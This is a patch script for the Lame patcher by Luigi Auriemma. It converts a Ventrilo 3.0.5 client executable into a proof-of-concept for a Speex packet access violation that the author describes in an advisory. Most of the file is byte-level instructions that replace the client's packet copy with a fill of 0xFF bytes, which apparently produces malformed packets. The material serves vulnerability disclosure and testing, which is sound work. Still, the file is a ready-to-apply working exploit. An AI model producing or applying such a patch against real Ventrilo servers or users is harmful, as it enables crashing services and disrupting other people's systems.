====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step for Windows:
# - launch lpatch.exe
# - select this ventspeex.lpatch file
# - read the message windows and click yes
# - select the file (usually executables or dlls) to patch
# - read the message windows to know if everything has been patched correctly
# - test your game

TITLE
    Ventrilo <= 3.0.5 Speex packet access violation 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:    aluigi.org

INTRO
    This patch converts a normal Ventrilo client 3.0.5 into a proof-of-concept
    for testing the vulnerability described here:
    .
    .
      http://aluigi.org/adv/ventspeex-adv.txt

FILE
    ventrilo.exe

BYTES_ORIGINAL
    8B 4E 04            ; MOV ECX,DWORD PTR DS:[ESI+4]
    8B 16               ; MOV EDX,DWORD PTR DS:[ESI]
    51                  ; PUSH ECX
    52                  ; PUSH EDX
    50                  ; PUSH EAX
    E8 ?? ?? ?? ??      ; CALL Ventrilo.004EB020
    83 C4 0C            ; ADD ESP,0C

BYTES_PATCH
    ?? ?? ??            ; MOV ECX,DWORD PTR DS:[ESI+4]
    57                  ; PUSH EDI
    8B F8               ; MOV EDI,EAX
    B0 FF               ; MOV AL,0FF
    F3 AA               ; REP STOS BYTE PTR ES:[EDI]
    5F                  ; POP EDI
    90 90 90 90 90      ; NOP

====================================================================================